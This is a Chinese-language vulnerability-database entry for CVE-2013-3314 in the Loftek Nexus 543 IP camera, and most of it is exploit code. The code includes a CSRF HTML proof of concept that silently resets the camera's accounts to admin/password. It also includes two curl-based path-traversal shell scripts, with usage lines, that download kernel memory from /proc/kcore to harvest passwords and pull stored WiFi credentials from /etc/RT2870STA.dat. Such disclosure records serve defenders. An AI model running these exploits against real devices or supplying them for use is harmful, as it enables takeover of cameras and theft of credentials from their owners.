Loftek Nexus 543 多个信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121838 漏洞类型 信息泄露
发布时间 2013-08-26 更新时间 2013-08-26
CVE编号 CVE-2013-3314 CNNVD-ID CNNVD-201308-389
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/27878
https://www.securityfocus.com/bid/61969
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-389
|漏洞详情
LoftekNexus543是Loftek公司的一款网络摄像机产品。LoftekNexus543中存在多个信息泄露漏洞。攻击者可利用这些漏洞泄露敏感信息,有助于发起进一步攻击。
|漏洞EXP
CSRF:

<HTML><TITLE>Loftek Nexus 543 CSRF PoC</TITLE>
<IMG SRC="http://ip-camera-address/set_users.cgi?next_url=rebootme.htm&user1=admin&pwd1=password&pri1=2&user2=anon&pwd2=password&pri2=0&user3=&pwd3=&pri3=1&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0" ALT="Your password has been reset to admin/password">
</HTML>


Memory Dump:

#!/bin/sh
# This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera
# The file which is downloaded can be analyzed (strings) to recover passwords and other goodies


if [[ "$1x" != "x" && "$2x" != "x" ]]; then
	curl http://$1/../proc/kcore -o $2 
	exit
fi
echo "Usage: $0 Nexus-543-IP output_file" 

WiFi Creds:


#!/bin/sh
# This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera

if [ "$1x" != "x" ]; then
	curl http://$1/../etc/RT2870STA.dat
	exit
fi
echo "Usage: $0 Nexus-543-IP"
|受影响的产品
LOFTEK Nexus 543 0
|参考资料

来源:BID
名称:61969
链接:http://www.securityfocus.com/bid/61969